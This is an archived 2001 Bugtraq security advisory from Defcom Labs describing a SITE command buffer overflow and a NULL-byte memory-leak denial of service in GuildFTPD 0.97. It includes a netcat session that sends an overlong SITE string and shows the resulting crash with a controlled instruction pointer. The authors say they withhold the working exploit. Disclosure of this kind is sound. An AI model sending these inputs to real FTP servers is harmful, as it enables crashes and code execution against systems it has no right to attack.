From andreas.junestam@defcom.com Mon May 28 12:59:45 2001 From: andreas junestam To: bugtraq@securityfocus.com Date: Sun, 27 May 2001 21:37:06 +0100 Subject: def-2001-27: GuildFTPD Buffer Overflow and Memory Leak DoS ====================================================================== Defcom Labs Advisory def-2001-27 GuildFTPD Buffer Overflow and Memory Leak DoS Author: Andreas Junestam Co-Author: Janne Sarendal Release Date: 2001-05-22 ====================================================================== ------------------------=[Brief Description]=------------------------- GuildFTPD contains two different problems: 1. Buffer overrun in the SITE command with the ability to execute arbitrary code 2. A memory leak in the input parsing code ------------------------=[Affected Systems]=-------------------------- - GuildFtpd v0.97 (probably earlier versions too) ----------------------=[Detailed Description]=------------------------ * SITE command Buffer Overflow All the SITE commands are handled in a dll(sitecmd.dll) which suffers from a buffer overflow. By sending a site command greater than 261 bytes, a buffer will overflow and it is possible to execute arbitrary code. We have choosen not to include the working exploit. C:\>nc 127.0.0.1 21 220-GuildFTPD FTP Server (c) 1999,2000 220-Version 0.97 220 Please enter your name: user a 331 User name okay, Need password. pass a 230 User logged in. site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Access violation - code c0000005 (first chance) eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0 eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206 * Memory Leak DoS The input parsing code in GuildFTPD contains a memory leak that will trigger if you send it a request containing a NULL(0x0) character. GuildFTPD will still answer new requests, but, eventually the server will run out of memory and the machine will crash. ---------------------------=[Workaround]=----------------------------- None for the moment -------------------------=[Vendor Response]=-------------------------- This issue was brought to the developer's attention on the 24th of April, 2001, no response so far. ====================================================================== This release was brought to you by Defcom Labs UK labs@defcom.com www.defcom.com ======================================================================